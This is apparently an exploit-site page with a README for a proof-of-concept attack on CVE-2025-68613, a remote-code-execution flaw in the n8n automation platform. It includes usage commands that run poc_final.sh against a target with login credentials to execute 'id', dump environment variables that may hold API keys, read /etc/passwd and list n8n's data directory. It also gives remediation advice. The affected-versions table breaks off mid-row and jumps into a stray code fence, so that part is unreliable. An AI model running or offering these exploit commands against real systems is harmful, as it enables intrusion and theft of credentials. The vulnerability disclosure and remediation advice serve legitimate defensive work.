Share
## https://sploitus.com/exploit?id=9C444357-CCE0-54A3-80AA-4417A3AB1F9F
# CVE-2025-68613 โ€” n8n RCE via Expression Injection

> **For educational and authorized security research purposes only.**

## Overview

Critical RCE vulnerability (CVSS 9.9) in n8n workflow automation platform. Authenticated users can execute arbitrary OS commands via the `executeCommand` node, bypassing sandbox restrictions.

| Field | Detail |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (Critical) |
| Affected versions | >= 0.211.0    
```

**Examples:**

```bash
# Basic RCE
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'id'

# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'env'

# Read sensitive files
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'cat /etc/passwd'

# List n8n data directory
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'ls -la ~/.n8n/'
```

> **Note:** If your password contains special characters like `!`, use single quotes.

## Remediation

Upgrade to **n8n >= 1.120.4** immediately.

If upgrading is not immediately possible:
- Restrict workflow creation and editing to fully trusted users only
- Run n8n with minimal OS privileges
- Use network segmentation to limit exposure

## References

- [n8n Security Advisory GHSA-v98v-ff95-f3cp](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp)
- [NVD โ€” CVE-2025-68613](https://nvd.nist.gov/vuln/detail/CVE-2025-68613)

## Disclaimer

This tool is provided for **educational purposes and authorized security testing only**. Unauthorized use against systems you do not own or have explicit written permission to test is illegal. The author is not responsible for any misuse.